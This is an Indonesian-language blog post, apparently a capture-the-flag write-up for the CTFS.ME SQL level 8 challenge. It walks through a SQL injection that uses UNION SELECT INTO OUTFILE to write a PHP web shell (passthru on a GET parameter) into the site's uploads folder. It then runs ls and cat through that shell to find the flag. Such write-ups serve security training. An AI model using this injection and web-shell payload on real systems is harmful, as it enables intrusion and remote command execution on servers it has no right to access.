Monday, December 3, 2018

[CTFS.ME] Writeup SQL Level 8 SQL UNION SELECT INTO OUTFILE

saya akan menjawab soal level 8 terlebih dahulu karena sepertinya untuk mendapatkan flag level 7 saya perlu menyelesaikan level 8, disoal ini saya akan menggunakan UNION SELECT INTO OUTFILE jadi bisa digunakan untuk mengupload file.

coba anda open source pada web soal maka anda akan menemukan link yang dikomentar seperti
<!--<li><a href="/uploads/">Our files</a></li>-->
<!--<li><a href="/phpinfo.php">Debug</a></li>-->
wow itu kita bisa mengecek info phpnya jadi kita cari document rootnya "/var/www/html", pertama kita mencari jumlah kolum jadi "domain/level8.php?id=2 UNION SELECT 1,2-- ", ternyata terdapat dua fie disini bisa dimanfaatkan untuk menggunakan untuk mengupload shell.

setelah mendapatkan jumlah kolum kita langsung saja pakai Query " UNION SELECT "<?php passthru($_GET[\"cmd\"]);?>","" INTO OUTFILE "/var/www/html/uploads/belajar_jadi_haker.php"-- ", berhasil di upload.

setelah itu anda buka nama file yang sudah kita upload tadi, contoh seperti "domain/uploads/belajar_jadi_haker.php" jika tidak ada pesan error maka file berhasil di upload.

selanjutnya kita melihat apa saja yang terdapat pada file root dengan perintah seperti ini " /uploads/belajar_jadi_haker.php?cmd=ls /var/www/html/" maka akan muncul list folder dan file, saya menemukan folder mencurigakan kemungkinan flagnya disana yaitu secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell.

kemudian kita bongkar folder tersebut dengan " domain/uploads/belajar_jadi_haker.php?cmd=ls /var/www/html/secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell" dan terdapat file flag.php.

langsung saya cat file flag tersebut dengan " /uploads/belajar_jadi_haker.php?cmd=cat /var/www/html/secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell/flag.php" ternyata tidak muncul apa2 :) lalu saya open source flag.php dan flag disembunyikan di komentar html :).

NB: passthru? itu merupakan function bawaan php yang bisa digunakan untuk menjalan perintah Cmd



Referensi:
http://0haxor.blogspot.com/2012/08/into-outfile-uploading-your-shell-with.html

No comments:

Post a Comment